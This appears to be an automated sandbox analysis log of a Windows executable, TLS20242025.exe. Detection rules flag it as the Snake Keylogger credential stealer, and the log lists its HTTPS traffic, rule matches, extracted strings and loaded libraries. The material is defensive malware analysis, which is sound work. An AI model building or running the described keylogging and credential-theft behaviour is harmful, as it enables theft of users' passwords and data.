                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49734 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_0105C1472_2_0105C147
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_0105A0882_2_0105A088
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_010553622_2_01055362
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_0105D2782_2_0105D278
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_0105C46A2_2_0105C46A
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_0105C7382_2_0105C738
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_0105E9882_2_0105E988
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_010569A02_2_010569A0
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_0105CA082_2_0105CA08
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_0105CCD82_2_0105CCD8
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_0105CFAA2_2_0105CFAA
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_01056FC82_2_01056FC8
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_01053E092_2_01053E09
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_0105F9742_2_0105F974
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_0105E97A2_2_0105E97A
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_010529E02_2_010529E0
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D1E802_2_067D1E80
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D17A02_2_067D17A0
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DFC682_2_067DFC68
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D9C182_2_067D9C18
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D95482_2_067D9548
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DE2582_2_067DE258
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D0B302_2_067D0B30
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D50282_2_067D5028
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D29682_2_067D2968
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D1E702_2_067D1E70
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DDE002_2_067DDE00
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DE6B02_2_067DE6B0
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DE6AF2_2_067DE6AF
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DE6A02_2_067DE6A0
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DEF602_2_067DEF60
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D178F2_2_067D178F
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DCCA02_2_067DCCA0
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DCC8F2_2_067DCC8F
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DD5502_2_067DD550
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DD5402_2_067DD540
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DDDFF2_2_067DDDFF
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DDDF12_2_067DDDF1
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DE24B2_2_067DE24B
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DEAF82_2_067DEAF8
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D0B202_2_067D0B20
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DEB082_2_067DEB08
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DF3B82_2_067DF3B8
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DF3A82_2_067DF3A8
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D8BA02_2_067D8BA0
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D00402_2_067D0040
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D003F2_2_067D003F
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D50272_2_067D5027
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DF8102_2_067DF810
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D00072_2_067D0007
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DF8032_2_067DF803
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DD0F82_2_067DD0F8
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067D295F2_2_067D295F
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DD9A82_2_067DD9A8
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DD9A72_2_067DD9A7
                    Source: C:\Users\user\Desktop\TLS20242025.exeCode function: 2_2_067DD9992_2_067DD999
                    Source: TLS20242025.exe, 00000000.00000000.2128299617.0000000000532000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePvI.exe( vs TLS20242025.exe
                    Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs TLS20242025.exe
                    Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs TLS20242025.exe
                    Source: TLS20242025.exe, 00000000.00000002.4583281992.0000000000A0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TLS20242025.exe
                    Source: TLS20242025.exe, 00000000.00000002.4587810220.0000000005200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs TLS20242025.exe
                    Source: TLS20242025.exe, 00000000.00000002.4585419626.000000000297D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs TLS20242025.exe
                    Source: TLS20242025.exe, 00000000.00000002.4585419626.000000000297D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs TLS20242025.exe
                    Source: TLS20242025.exe, 00000000.00000002.4587170944.00000000050E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameExample.dll0 vs TLS20242025.exe
                    Source: TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs TLS20242025.exe
                    Source: TLS20242025.exe, 00000002.00000002.4583338825.00000000009A7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs TLS20242025.exe
                    Source: TLS20242025.exeBinary or memory string: OriginalFilenamePvI.exe( vs TLS20242025.exe
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TLS20242025.exe.50e0000.5.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
                    Source: 0.2.TLS20242025.exe.50e0000.5.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@3/3
                    Source: C:\Users\user\Desktop\TLS20242025.exeMutant created: NULL
                    Source: TLS20242025.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: TLS20242025.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\TLS20242025.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002D78000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002DBB000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002D88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: TLS20242025.exeReversingLabs: Detection: 35%
                    Source: unknownProcess created: C:\Users\user\Desktop\TLS20242025.exe "C:\Users\user\Desktop\TLS20242025.exe"
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess created: C:\Users\user\Desktop\TLS20242025.exe "C:\Users\user\Desktop\TLS20242025.exe"
                    Source: C:\Users\user\Desktop\TLS20242025.exeProcess created: C:\Users\user\Desktop\TLS20242025.exe "C:\Users\user\Desktop\TLS20242025.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TLS20242025.exeSection loaded: dpapi.dllJump to behavior
